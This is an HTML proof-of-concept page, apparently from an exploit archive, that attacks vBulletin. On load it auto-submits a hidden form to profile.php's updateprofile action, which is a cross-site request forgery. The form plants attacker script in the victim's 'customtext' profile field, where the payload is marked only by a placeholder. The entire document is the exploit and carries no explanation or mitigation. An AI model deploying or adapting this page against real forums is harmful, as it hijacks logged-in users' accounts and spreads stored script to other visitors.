<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="
http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile"
method="POST" name="form">
<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>